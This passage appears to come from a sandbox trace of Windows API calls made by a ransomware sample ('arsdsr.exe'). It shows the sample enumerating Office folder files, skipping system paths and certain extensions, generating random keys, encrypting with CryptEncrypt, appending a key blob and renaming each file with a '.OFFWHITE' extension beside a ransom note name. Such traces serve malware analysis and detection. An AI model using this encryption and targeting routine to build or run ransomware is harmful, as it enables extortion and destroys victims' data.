GetLastError () returned 0x0 [0145.473] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xba60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.473] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.473] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xbb60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.473] WriteFile (in: hFile=0x218, lpBuffer=0x52ebd0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ebd0*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.473] GetProcessHeap () returned 0x500000 [0145.473] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb960) returned 0x5607c8 [0145.473] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.474] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xb960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xb960, lpOverlapped=0x0) returned 1 [0145.478] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.478] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xb960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xb960, lpOverlapped=0x0) returned 1 [0145.478] GetProcessHeap () returned 0x500000 [0145.478] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.478] CloseHandle (hObject=0x218) returned 1 [0145.478] GetProcessHeap () returned 0x500000 [0145.479] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.479] GetProcessHeap () returned 0x500000 [0145.479] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.479] GetProcessHeap () returned 0x500000 [0145.479] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.479] GetProcessHeap () returned 0x500000 [0145.479] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.479] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" [0145.479] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.OFFWHITE" [0145.479] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.offwhite")) returned 1 [0145.480] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".") returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="..") returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="...") returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="windows") returned -1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="rsa") returned -1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="programdata") returned -1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="appdata") returned 1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="program files") returned -1 [0145.480] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.480] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.480] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="GRINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" [0145.480] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.480] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.480] PathFindExtensionW (pszPath="GRINTL32.REST.trx_dll") returned=".trx_dll" [0145.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.480] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.481] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.481] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.481] GetProcessHeap () returned 0x500000 [0145.481] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546d98 [0145.481] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.481] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=235872) returned 1 [0145.482] GetProcessHeap () returned 0x500000 [0145.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.482] GetProcessHeap () returned 0x500000 [0145.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.482] GetProcessHeap () returned 0x500000 [0145.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.482] GetProcessHeap () returned 0x500000 [0145.482] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.482] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.482] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.482] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.482] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.482] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.482] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.482] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.483] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.483] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.483] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x39960, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.483] SetLastError (dwErrCode=0x0) [0145.483] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.486] GetLastError () returned 0x0 [0145.486] GetLastError () returned 0x0 [0145.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x39a60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.486] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.486] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x39b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.486] WriteFile (in: hFile=0x218, lpBuffer=0x546d98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546d98*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.487] GetProcessHeap () returned 0x500000 [0145.487] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x39960) returned 0x5607c8 [0145.487] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.487] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x39960, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x39960, lpOverlapped=0x0) returned 1 [0145.504] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.504] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x39960, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x39960, lpOverlapped=0x0) returned 1 [0145.505] GetProcessHeap () returned 0x500000 [0145.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.505] CloseHandle (hObject=0x218) returned 1 [0145.505] GetProcessHeap () returned 0x500000 [0145.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.505] GetProcessHeap () returned 0x500000 [0145.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.505] GetProcessHeap () returned 0x500000 [0145.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.505] GetProcessHeap () returned 0x500000 [0145.505] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.505] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" [0145.505] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.OFFWHITE" [0145.505] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.offwhite")) returned 1 [0145.506] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302da400, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x302da400, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x47d60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".") returned 1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="..") returned 1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="...") returned 1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="windows") returned -1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="rsa") returned -1 [0145.506] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0145.507] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="programdata") returned -1 [0145.507] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="appdata") returned 1 [0145.507] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="program files") returned -1 [0145.507] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0145.507] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.507] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="MAPIR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" [0145.507] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.507] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.507] PathFindExtensionW (pszPath="MAPIR.DLL.trx_dll") returned=".trx_dll" [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.507] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.507] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0145.507] GetProcessHeap () returned 0x500000 [0145.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546da8 [0145.508] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.508] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=294240) returned 1 [0145.508] GetProcessHeap () returned 0x500000 [0145.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.508] GetProcessHeap () returned 0x500000 [0145.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.508] GetProcessHeap () returned 0x500000 [0145.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.508] GetProcessHeap () returned 0x500000 [0145.508] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.508] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.508] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.509] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.509] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.509] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.509] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.509] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.509] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.509] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.509] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.509] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.509] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.510] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x47d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.510] SetLastError (dwErrCode=0x0) [0145.510] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.512] GetLastError () returned 0x0 [0145.512] GetLastError () returned 0x0 [0145.512] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x47e60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.512] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.512] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x47f60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.512] WriteFile (in: hFile=0x218, lpBuffer=0x546da8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546da8*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.512] GetProcessHeap () returned 0x500000 [0145.512] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x47d60) returned 0x5607c8 [0145.512] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.512] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x47d60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x47d60, lpOverlapped=0x0) returned 1 [0145.534] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.534] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x47d60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x47d60, lpOverlapped=0x0) returned 1 [0145.535] GetProcessHeap () returned 0x500000 [0145.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.535] CloseHandle (hObject=0x218) returned 1 [0145.535] GetProcessHeap () returned 0x500000 [0145.535] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.536] GetProcessHeap () returned 0x500000 [0145.536] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.536] GetProcessHeap () returned 0x500000 [0145.536] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.536] GetProcessHeap () returned 0x500000 [0145.536] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.536] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" [0145.536] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.OFFWHITE" [0145.536] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.offwhite")) returned 1 [0145.537] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".") returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="..") returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="...") returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="windows") returned -1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="rsa") returned -1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="programdata") returned -1 [0145.537] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", 